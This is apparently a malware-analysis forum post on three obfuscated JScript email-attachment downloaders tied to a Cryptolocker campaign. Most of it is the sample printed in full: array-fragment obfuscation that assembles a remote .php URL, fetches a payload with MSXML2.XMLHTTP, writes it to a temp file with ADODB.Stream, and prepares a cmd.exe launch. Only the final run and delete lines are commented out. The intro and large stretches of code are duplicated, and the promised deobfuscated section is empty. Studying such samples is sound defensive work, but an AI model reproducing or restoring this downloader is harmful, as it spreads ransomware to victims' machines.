- May 14, 2016
- 1,597
From https://malwaretips.com/threads/21-11-2016-7.65690/
Thanks to @Daniel Hidalgo
8/54 INFO_19595.js
6/54 EURO_8636.js
6/54 EMAIL_25793.js
Why these samples ?
Because there are from the same family I analyzed few days ago, but the error mentioned and obfuscation used with the arrays has been improved.
YOU REALLY NEED TO SEE THE PREVIOUS ANALYSIS BEFORE READ THE CURRENT ONE
The link from the previous test :
https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
These 3 samples use the same URL to download the payload, and the script parts use the same obfuscation methods.
So, I will only shows the changes from POSTNORD_1755.js using as example EMAIL_25793.js
1) What it looks like :
As usual, I made some modification on the spoiler part to avoid "copy-paste => save => run => infection
2) Main differences with previous analyzed POSTNORD_1755.js :
2-1 ) The arrays parts :
Before :
With this method, it is very easy to find the "piece of strings" because it is always the last value of the array that is useful.
The previous sample in details : https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
In the new samples :
In the previous sample, there was an error :
In these new samples, they have corrected it :
case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
Only one part is useful :
The other parts are the famous useless arrays stuff (see previous part 2-1) ) only put to obfuscate a bit more the script
(remember we have seen var hvaqxena : "return ActiveXObject;");
3) Main part - deobuscated :
4) Conclusion :
Thanks to @Daniel Hidalgo
8/54 INFO_19595.js
6/54 EURO_8636.js
6/54 EMAIL_25793.js
Why these samples ?
Because there are from the same family I analyzed few days ago, but the error mentioned and obfuscation used with the arrays has been improved.
YOU REALLY NEED TO SEE THE PREVIOUS ANALYSIS BEFORE READ THE CURRENT ONE
The link from the previous test :
https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
These 3 samples use the same URL to download the payload, and the script parts use the same obfuscation methods.
So, I will only shows the changes from POSTNORD_1755.js using as example EMAIL_25793.js
1) What it looks like :
As usual, I made some modification on the spoiler part to avoid "copy-paste => save => run => infection
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
var yfezico0 = [8, "9 =", 9, 8, 8, 8, 5, 1]["1"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var kzunaxve5 = [6, 5, 7, 7, 6, 7, 8, 5, "eTo"]["8"];
var jzucpekkage = [4, 3, 6, 3, 5, 4, "cia", 2, 6, 3]["6"];
var otvebolhyn = [5, 9, 5, 6, 2, 3, 8, 'on', 4, 2]["7"];
var bvunygze9 = [2, "rn '", 2, 6, 1, 6, 5, 1]["1"];
var yfjobulki = ["jw ", 1, 1, 7, 1, 6, 1, 4, 6, 4]["0"];
var jyryxxirnu = ['e', 2, 6, 2, 5, 9, 6, 4]["0"];
var qdiqxywili4 = [4, 7, 1, 5, "1')", 3, 3, 9, 5, 2]["4"];
var ohmicmoftil = ["scri", 6, 5, 4, 7, 6, 5, 4, 6]["0"];
var ygpagag = [4, 9, 6, 3, 2, "ont", 5, 2]["5"];
var lagyvgeq4 = [6, 3, 5, 1, 5, 2, "lFo", 3]["6"];
var xqasmyvpe = [" 4;", 3, 5, 2, 6, 8, 6, 9, 4]["0"];
var usbijvepij = [6, 3, "ngt", 8, 9, 9, 1, 4, 6, 3]["2"];
var qziherlamwo = [8, 2, 2, 6, 9, 6, 3, 9, "h.t", 4]["8"];
var slyplumxop8 = [1, 6, 8, 4, 3, 6, "bje", 9, 1, 1]["6"];
var iwebog = [5, 4, 3, 5, 7, "yst", 3, 5, 4]["5"];
var gemoto6 = [5, 3, 5, 3, 8, 3, "etu", 8, 9]["6"];
var binsujod1 = [3, 4, "xv9", 8, 7, 5, 8, 5, 3]["2"];
var bzacoge6 = [1, 4, 1, 3, "stem", 6, 7, 5, 5, 7]["4"];
var izretadvi = [3, 5, 2, 1, "ive", 7, 9, 2]["4"];
var cbufzeqkulc5 = [1, 3, 6, 6, 4, "MSXM", 2, 9]["5"];
var tanynu2 = [4, "ct';", 4, 6, 5, 6, 2, 8]["1"];
var iqjiwpalo = [9, 7, 9, 9, 8, 2, 5, "tiv", 6, 2]["7"];
var utyxoju2 = ["g.Fi", 4, 9, 3, 8, 3, 9, 4]["0"];
var otyvzysun = [7, 3, "urn", 4, 2, 3, 1, 4, 8, 7]["2"];
var qusuhyxi = ['Stat', 1, 8, 3, 2, 6, 5, 5]["0"];
var yfomgurudm = [7, 8, 8, "Nam", 5, 5, 6, 1, 2]["3"];
var worityn = [8, 2, "Act", 9, 8, 1, 8, 8, 1, 7]["2"];
var vvecjijki4 = [4, 4, 6, 9, 6, 1, 5, "htt", 8]["7"];
var lgufjaregzi = ['iti', 7, 2, 3, 7, 2, 3, 9, 6, 4]["0"];
var aqympiw = WScript;
var akiwely = [7, "0()", 1, 7, 3, 6, 3, 8]["1"];
var yxytud8 = [2, 9, 7, "p:/", 5, 4, 2, 9]["3"];
var uzanulx = [2, 7, 8, 6, 8, 1, 1, 5, 4, "asu"]["9"];
var uxysizi = [4, 6, 6, 2, 6, 8, 9, "/ww", 7]["7"];
var fumweledzu6 = ["ipt.", 5, 2, 8, 2, 6, 6, 5]["0"];
var wexuflu = [1, 3, 8, 2, 'me', 9, 1, 2, 5]["4"];
var rajkezhefli = [8, 3, 6, 4, 7, "ptin", 1, 2, 4]["5"];
var ugipit5 = [5, "op/", 7, 7, 5, 3, 7, 3]["1"];
var ruxrabu = [7, 'me', 9, 6, 7, 5, 7, 8]["1"];
var qcevesrozci = [4, 6, 9, "h >", 6, 5, 9, 5, 5]["3"];
var yptypmewo4 = [8, 7, 9, 6, 1, 7, 2, "ily"]["7"];
var yfhopiqluhh2 = [7, 8, 5, 7, 1, 4, "ath", 4, 4]["6"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var zevibnib = [1, "seB", 1, 4, 2, 2, 2, 5, 7, 8]["1"];
var jajyhyxwy = [7, 6, 5, 8, 2, 8, 8, 3, 6, 'Ful']["9"];
var yjybxywif5 = [8, 9, 2, "teP", 8, 7, 4, 7, 5]["3"];
var wmunafy = [7, 3, 7, 6, 2, "eam", 8, 9]["5"];
var gamcedeku0 = ["jw.", 8, 8, 1, 1, 5, 8, 7]["0"];
var mazqakyjzo = [3, 5, 5, "ADO", 5, 5, 5, 5]["3"];
var osabaq = [9, 6, 2, 'Typ', 1, 1, 1, 2]["3"];
var nygqyczoz = [2, 3, 4, 7, "MLHT", 9, 8, 6, 6]["4"];
var bidnovvyqp6 = ["apl", 4, 3, 5, 9, 7, 4, 1, 3]["0"];
var awgykpomoj1 = ["Clos", 3, 9, 3, 9, 2, 8, 9, 7, 2]["0"];
var tfufubres0 = [3, 5, 8, 5, 7, 'Tem', 8, 5]["5"];
var keluqy4 = [3, 2, 2, 9, 1, 9, "bje", 7]["6"];
var lgimonra3 = [1, "Pos", 1, 9, 2, 4, 1, 4]["1"];
var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
var zbydiqsoli4 = [6, "at", 5, 5, 2, 2, 1, 9, 1, 8]["1"];
var brisewet = [6, 5, 9, 7, 9, "L2.X", 1, 4, 9, 4]["5"];
var fjynhevonra1 = [2, 'Sav', 9, 2, 9, 3, 2, 8, 1, 5]["1"];
var molycohj0 = ["e('", 6, 1, 5, 2, 5, 3, 9, 3, 7]["0"];
var ashesubw5 = [5, 5, 4, 8, 2, 5, 1, 5, "akp", 2]["8"];
var mypzynkug = ["?f=", 1, 9, 8, 8, 7, 4, 3]["0"];
var hnegfepsuta3 = [2, 7, 3, 4, 1, 3, 5, 6, "te", 9]["8"];
var brigigo4 = [6, "Obje", 5, 5, 2, 5, 9, 3]["1"];
var iveruky = [3, 3, "Abs", 6, 6, 7, 2, 2, 4, 9]["2"];
var hdocirzy1 = [5, 6, "e", 2, 5, 9, 2, 7, 9]["2"];
var kjunyhimo = [8, 9, 4, 7, 1, "Get", 5, 6, 8]["5"];
var tonumejt = [3, 6, 5, "ipt", 3, 1, 7, 1]["3"];
var tigviqzave7 = [9, "ing", 8, 5, 4, 1, 1, 8]["1"];
var ysgupuphuwh = [3, 9, "wug", 2, 7, 4, 8, 3, 2, 6]["2"];
var umunozemw = [1, 5, 2, 4, 6, 9, 8, 8, "retu"]["8"];
var djyvoroc = [7, 6, 8, 5, 9, 9, 2, "l", 1, 7]["7"];
var ytydqesxer0 = [9, 1, 8, 3, 6, 4, 3, 2, "ew ", 9]["8"];
var exaqkyvtir = [4, "t(m", 7, 5, 6, 5, 5, 6]["1"];
var uvmewasca = [9, 7, 1, 9, 8, 8, 3, 2, 4, 'r']["9"];
var izucuwg3 = [6, 2, 4, ".le", 7, 3, 9, 1, 5]["3"];
var ucyvyxquqk = [9, 9, 7, 9, 8, 3, "jec", 2]["6"];
var ynabovx4 = [6, "us", 5, 3, 6, 8, 4, 7, 8]["1"];
var omxemhylf2 = [4, 5, 3, 4, 6, " jr", 4, 2, 6]["5"];
var ysvafvef4 = [2, 6, 6, 8, 6, "ret", 4, 1]["5"];
var evqubecipn7 = [1, 7, 9, 3, 4, 9, 1, "); ", 6, 6]["7"];
var bifwotpu = ["; r", 9, 1, 5, 4, 7, 9, 7, 5]["0"];
var jenhadno1 = ['ody', 2, 1, 8, 4, 1, 9, 7]["0"];
var rtyrcomozsa8 = [8, 5, 4, 9, 'Get', 5, 4, 1]["4"];
var yksazbasfo8 = [6, 'Res', 6, 9, 8, 1, 9, 1, 5]["1"];
var ywdoczycg = [3, 5, "Str", 3, 6, 1, 5, 7]["2"];
var nuvykkorbu = [7, "Shel", 1, 7, 8, 2, 2, 1, 9]["1"];
var onbitbij = ["WScr", 8, 7, 4, 7, 3, 8, 2, 5, 8]["0"];
var ybyjecehm = [2, "DB.", 6, 2, 6, 8, 6, 8]["1"];
var vwafgehni0 = [1, 9, 6, "run", 6, 6, 8, 1, 6]["3"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var uqdostufy1 = [5, 5, "= n", 9, 6, 5, 1, 3]["2"];
var bbegvobexjy6 = [1, 2, 1, 3, 5, 8, 2, 4, "TP"]["8"];
var porosy6 = [9, 3, "asu", 5, 8, 1, 9, 3]["2"];
var hgudipcu = [2, 4, 2, 2, 1, 4, 6, "n", 1, 3]["7"];
var ojhenyteht = ["rn ", 3, 5, 6, 1, 9, 9, 5, 2, 7]["0"];
var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
var ofeqyxhuwt = [4, 9, "eXO", 1, 3, 7, 1, 3]["2"];
var kpiheko = [3, 8, 5, 5, 6, 6, 5, 6, "ugv", 5]["8"];
var deqxihaky = [2, 9, 7, 5, 2, 9, "olu", 1]["6"];
var kyvgicis3 = [1, 3, 1, 3, 7, 4, 1, 8, "var", 1]["8"];
var obutdymi = [4, 'Fil', 4, 4, 8, 7, 4, 5, 2]["1"];
var tkymrawcy = [2, 5, 3, 9, 1, 'ipt', 8, 3, 6, 7]["5"];
var fhadisuhy = [6, 6, 3, 1, 8, 4, "leS", 2, 1, 6]["6"];
var rzedsygwu = [3, 3, 6, 7, 7, "w.c", 5, 1]["5"];
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var udbuxdakhavq = [1, 2, 8, 6, "adm", 9, 5, 1]["4"];
var fdukezyh8 = [6, 5, 3, 5, 9, 9, 6, 2, "Scr", 7]["8"];
var texlopkak1 = [2, 7, 5, 3, "Scr", 8, 6, 8, 6, 6]["4"];
var episyvt7 = [7, 6, 5, 8, 5, 1, 6, 7, "php", 9]["8"];
var ewnehaca = [8, 9, 9, " Ac", 3, 9, 2, 1]["3"];
var emytipq = [7, 4, 5, 9, 1, 5, 3, "ct;", 3, 3]["7"];
var soxispi = [1, ".Fi", 2, 2, 3, 1, 5, 9]["1"];
var ihdufdutynd6 = [9, 8, 5, 3, 4, 6, 3, 2, 6, "XOb"]["9"];
var uflesepf = [3, "riv", 2, 4, 4, 2, 6, 6, 8, 9]["1"];
var zudxoba8 = [2, 7, 'e', 3, 3, 4, 4, 7, 3, 1]["2"];
var bacodta2 = [4, 7, "emO", 8, 5, 8, 4, 1, 4]["2"];
var afehjate1 = [9, 5, 'lNa', 1, 9, 3, 7, 5, 2, 8]["2"];
var exacdubx = [3, 8, 9, 8, 7, 5, "in.", 8, 3]["6"];
var oxefzetfez2 = [1, 2, "vil", 5, 9, 4, 2, 4, 3, 5]["2"];
var ipexetl = [5, 8, " jr", 6, 2, 2, 4, 1, 2]["2"];
var hhitwycyxd0 = [4, 4, 5, 1, 6, 'lde', 1, 2]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var snumsisike = [8, 1, 4, 3, 3, 9, 1, 'Wri', 6, 7]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
var quludvi1 = ["Spe", 8, 3, 7, 9, 1, 9, 5]["0"];
var aptimota = [8, "var", 9, 6, 6, 7, 4, 7, 4]["1"];
var mixemrid4 = [9, 5, "ct", 2, 6, 5, 7, 5, 8, 9]["2"];
var odrifmigh = [8, "lesy", 1, 5, 7, 3, 8, 8, 7]["1"];
var odomebef = [4, 6, 7, 8, 7, 3, "pon", 5]["6"];
var zcexsaqekg = [2, "Get", 1, 9, 3, 9, 8, 1]["1"];
var ulhabvaze2 = [8, 5, 6, 9, 7, 7, "edz", 4]["6"];
var etjufymurb = [3, 7, 8, 3, 9, 4, "yxv", 2, 4, 5]["6"];
var mopepo = ["GET", 7, 6, 2, 9, 7, 6, 5, 5]["0"];
var xdimrugva0 = [2, 8, 8, 2, 2, 3, 8, "ovw"]["7"];
var ahnensuhuv = [6, 6, 8, 9, "2.d", 7, 8, 8]["4"];
var gibdymco0 = [4, "pNa", 3, 9, 4, 5, 6, 6]["1"];
var ipjatzypko = [4, "zyd", 6, 6, 1, 8, 8, 5]["1"];
var cimwenxi = [9, " ov", 5, 4, 6, 5, 7, 8, 4, 6]["1"];
var urtiwguqja = [4, 1, 'Ope', 9, 8, 6, 7, 9, 3]["2"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
var irvyrzisi1 = [4, 7, 2, umunozemw + bvunygze9 + ohmicmoftil + rajkezhefli + utyxoju2 + odrifmigh + bzacoge6 + brigigo4 + tanynu2, 6, 9, 4, 9]["3"];
var dijditonz6 = [2, 4, 3, 3, 6, 7, kyvgicis3 + ipexetl + porosy6 + yfjobulki + uqdostufy1 + ytydqesxer0 + worityn + izretadvi + ihdufdutynd6 + ucyvyxquqk + exaqkyvtir + ipjatzypko + ashesubw5 + bidnovvyqp6 + akiwely + evqubecipn7 + aptimota + cimwenxi + ysgupuphuwh + oxefzetfez2 + etjufymurb + yfezico0 + omxemhylf2 + uzanulx + gamcedeku0 + kjunyhimo + iveruky + deqxihaky + yjybxywif5 + yfhopiqluhh2 + yfomgurudm + molycohj0 + qdiqxywili4 + bifwotpu + gemoto6 + ojhenyteht + xdimrugva0 + kpiheko + yptypmewo4 + binsujod1 + izucuwg3 + usbijvepij + qcevesrozci + xqasmyvpe, 5]["6"];
var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
var yvyndax = [6, 2, 4, 6, 3, 6, 5, 4, mazqakyjzo + ybyjecehm + ywdoczycg + wmunafy, 3]["8"];
var ijigsokhimw3 = [5, 5, 2, 9, 6, vvecjijki4 + yxytud8 + uxysizi + rzedsygwu + ygpagag + uflesepf + ulhabvaze2 + qziherlamwo + ugipit5 + udbuxdakhavq + exacdubx + episyvt7 + mypzynkug + ahnensuhuv + zbydiqsoli4, 3, 1, 5, 4]["5"];
var derfycgy = [5, 2, 8, 6, 2, 6, onbitbij + fumweledzu6 + nuvykkorbu + djyvoroc, 3, 7, 4]["6"];
var axduxynat = [cbufzeqkulc5 + brisewet + nygqyczoz + bbegvobexjy6, 1, 1, 6, 7, 9, 6, 8]["0"];
var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
var yzozyvy = [4, 4, 7, 6, mopepo, 9, 2, 1, 1, 9]["4"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
var imis9 = aqympiw;
var mzydakpapl0 = new Function(irvyrzisi1);
var mujegbe = [2, 7, 1, 8, ["rka", 1, 3, 6, 5, 5, 7, 7, 9], 1, 2, 3, 2, 2]["4"];
var cafyjep8 = [8, [6, 6, 3, 1, 3, 6, 4, 6, "cmi", 6], 5, 6, 8, 4, 2, 4]["1"];
var zfukqilvalho7 = [6, 9, 9, 3, 4, 9, 2, 9, 3, [2, 9, 7, 5, 1, 8, 5, 3, "up"]]["9"];
var yxivuvwus = [5, 9, 8, 1, 5, 3, 3, [4, 2, 9, 3, "vpa", 6, 7, 4, 5], 4]["7"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var yqlypnuksud = [8, 4, [8, 7, 1, 7, "gy", 3, 6, 4, 9, 6], 2, 5, 5, 8, 8, 1, 3]["2"];
var dcigacwa4 = [1, 5, 5, 7, 1, 9, 7, [1, 6, 1, "tto", 6, 2, 8, 5, 5], 7, 9]["7"];
var ubmycoble0 = [[2, "zh", 1, 3, 2, 5, 7, 4, 5], 7, 8, 3, 2, 9, 4, 2, 2, 6]["0"];
var ujtodunyf5 = [6, 7, [3, 5, 5, "co", 8, 4, 9, 8, 1], 8, 1, 1, 4, 5]["2"];
var japumu0 = [8, 6, [4, 7, 4, 7, 5, "ry", 9, 8, 6, 7], 7, 5, 5, 6, 1, 9, 3]["2"];
var zuvlezyxe8 = [[4, "lm", 6, 7, 6, 8, 9, 9, 5], 2, 1, 5, 3, 4, 1, 1, 1]["0"];
var ebecuntu5 = [5, 2, 3, 3, 5, 4, 2, ["lqy", 8, 2, 7, 6, 6, 1, 9, 6], 6, 1]["7"];
var mrovwegigca = [9, 3, 8, 3, 5, 1, [2, 2, "avb", 4, 5, 5, 4, 2], 6]["6"];
var zytxyfloldu = [7, 8, 2, 2, 6, 2, [4, "aq", 4, 8, 9, 3, 7, 8, 5, 9], 5, 4]["6"];
var qygsuwwo = [1, 1, [8, 2, "ex", 9, 6, 1, 8, 3], 4, 3, 1, 3, 5]["2"];
var ujdyqkoz = new Function(dijditonz6)();
var asborqyqkyrm0 = [3, [7, 1, 1, 1, 3, 9, "o", 2], 7, 9, 3, 8, 9, 5, 8, 1]["1"];
var gykehogcu3 = [5, 8, 9, 4, [4, 1, 5, 1, 6, 4, 7, "k", 3], 2, 9, 8, 3]["4"];
var daxzaxyme4 = [2, [1, 8, 8, 4, "abt", 1, 9, 7, 6, 8], 2, 7, 2, 1, 5, 6, 1]["1"];
var hcimuqxixw4 = [7, 8, [5, "u", 9, 5, 6, 9, 3, 6], 7, 9, 3, 6, 5]["2"];
var hujcesej = [9, 4, [4, 2, 7, "mna", 8, 6, 5, 5], 7, 4, 4, 9, 8, 7]["2"];
var epowpabnohp4 = [5, 8, 3, ["sc", 4, 8, 2, 7, 5, 6, 1], 9, 7, 5, 6, 2, 1]["3"];
var ymseppybi4 = [[6, 9, "va", 3, 3, 1, 8, 3], 2, 2, 9, 2, 3, 3, 8]["0"];
var gpasgufxeti0 = [4, 1, 4, 2, 5, 1, [8, 7, "g", 4, 7, 7, 8, 4, 9], 8, 3, 5]["6"];
var utduhaciwp3 = [1, 2, [8, 4, 7, 1, 2, 6, 3, 1, 7, "it"], 2, 4, 8, 3, 5]["2"];
var mjowyfzuk = [8, 9, 2, 5, 2, [4, "o", 4, 9, 1, 2, 1, 7], 3, 8, 5]["5"];
var vekxiby = [8, 9, 6, [5, 7, 2, 8, 4, "kq", 5, 7], 7, 6, 1, 4, 6]["3"];
var omalobre7 = [1, [5, 1, 5, 4, "xu", 3, 4, 7, 9, 7], 4, 9, 8, 8, 4, 9, 4]["1"];
var azocxisw = [[4, 8, 9, 8, "ufk", 8, 2, 3], 6, 2, 7, 2, 3, 2, 3, 9, 5]["0"];
var yxycqati = [5, 2, [5, 9, 9, 6, 4, 9, "z", 2, 8, 1], 7, 5, 1, 4, 9]["2"];
var guzcapebh = [3, 6, 5, 7, 8, 2, 9, [7, 3, "o", 4, 8, 6, 4, 7, 8]]["7"];
switch (ujdyqkoz) {
case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
var owdeqg2 = yvyndax;
var ekwidedul = new hvaqxena(owdeqg2);
ekwidedul[urtiwguqja + hgudipcu]();
var qupqykmy = ijigsokhimw3;
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
var gmavabava8 = derfycgy;
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
var exet3 = new hvaqxena(gmavabava8);
var qrujcydvipd9 = axduxynat;
var gvidummulj7 = epcemescip;
var jrasujw = new hvaqxena(gvidummulj7);
var abogikn = new hvaqxena(qrujcydvipd9);
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
abogikn[pdimuly]();
ekwidedul[osabaq + zudxoba8] = 1;
if (abogikn[qusuhyxi + ynabovx4] == 200) {
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
ekwidedul[awgykpomoj1 + hdocirzy1]();
var yhamgyv1 = odynfinteds + czeqip;
//exet3[vwafgehni0](yhamgyv1, 0);
}
//jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
var yfezico0 = [8, "9 =", 9, 8, 8, 8, 5, 1]["1"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var kzunaxve5 = [6, 5, 7, 7, 6, 7, 8, 5, "eTo"]["8"];
var jzucpekkage = [4, 3, 6, 3, 5, 4, "cia", 2, 6, 3]["6"];
var otvebolhyn = [5, 9, 5, 6, 2, 3, 8, 'on', 4, 2]["7"];
var bvunygze9 = [2, "rn '", 2, 6, 1, 6, 5, 1]["1"];
var yfjobulki = ["jw ", 1, 1, 7, 1, 6, 1, 4, 6, 4]["0"];
var jyryxxirnu = ['e', 2, 6, 2, 5, 9, 6, 4]["0"];
var qdiqxywili4 = [4, 7, 1, 5, "1')", 3, 3, 9, 5, 2]["4"];
var ohmicmoftil = ["scri", 6, 5, 4, 7, 6, 5, 4, 6]["0"];
var ygpagag = [4, 9, 6, 3, 2, "ont", 5, 2]["5"];
var lagyvgeq4 = [6, 3, 5, 1, 5, 2, "lFo", 3]["6"];
var xqasmyvpe = [" 4;", 3, 5, 2, 6, 8, 6, 9, 4]["0"];
var usbijvepij = [6, 3, "ngt", 8, 9, 9, 1, 4, 6, 3]["2"];
var qziherlamwo = [8, 2, 2, 6, 9, 6, 3, 9, "h.t", 4]["8"];
var slyplumxop8 = [1, 6, 8, 4, 3, 6, "bje", 9, 1, 1]["6"];
var iwebog = [5, 4, 3, 5, 7, "yst", 3, 5, 4]["5"];
var gemoto6 = [5, 3, 5, 3, 8, 3, "etu", 8, 9]["6"];
var binsujod1 = [3, 4, "xv9", 8, 7, 5, 8, 5, 3]["2"];
var bzacoge6 = [1, 4, 1, 3, "stem", 6, 7, 5, 5, 7]["4"];
var izretadvi = [3, 5, 2, 1, "ive", 7, 9, 2]["4"];
var cbufzeqkulc5 = [1, 3, 6, 6, 4, "MSXM", 2, 9]["5"];
var tanynu2 = [4, "ct';", 4, 6, 5, 6, 2, 8]["1"];
var iqjiwpalo = [9, 7, 9, 9, 8, 2, 5, "tiv", 6, 2]["7"];
var utyxoju2 = ["g.Fi", 4, 9, 3, 8, 3, 9, 4]["0"];
var otyvzysun = [7, 3, "urn", 4, 2, 3, 1, 4, 8, 7]["2"];
var qusuhyxi = ['Stat', 1, 8, 3, 2, 6, 5, 5]["0"];
var yfomgurudm = [7, 8, 8, "Nam", 5, 5, 6, 1, 2]["3"];
var worityn = [8, 2, "Act", 9, 8, 1, 8, 8, 1, 7]["2"];
var vvecjijki4 = [4, 4, 6, 9, 6, 1, 5, "htt", 8]["7"];
var lgufjaregzi = ['iti', 7, 2, 3, 7, 2, 3, 9, 6, 4]["0"];
var aqympiw = WScript;
var akiwely = [7, "0()", 1, 7, 3, 6, 3, 8]["1"];
var yxytud8 = [2, 9, 7, "p:/", 5, 4, 2, 9]["3"];
var uzanulx = [2, 7, 8, 6, 8, 1, 1, 5, 4, "asu"]["9"];
var uxysizi = [4, 6, 6, 2, 6, 8, 9, "/ww", 7]["7"];
var fumweledzu6 = ["ipt.", 5, 2, 8, 2, 6, 6, 5]["0"];
var wexuflu = [1, 3, 8, 2, 'me', 9, 1, 2, 5]["4"];
var rajkezhefli = [8, 3, 6, 4, 7, "ptin", 1, 2, 4]["5"];
var ugipit5 = [5, "op/", 7, 7, 5, 3, 7, 3]["1"];
var ruxrabu = [7, 'me', 9, 6, 7, 5, 7, 8]["1"];
var qcevesrozci = [4, 6, 9, "h >", 6, 5, 9, 5, 5]["3"];
var yptypmewo4 = [8, 7, 9, 6, 1, 7, 2, "ily"]["7"];
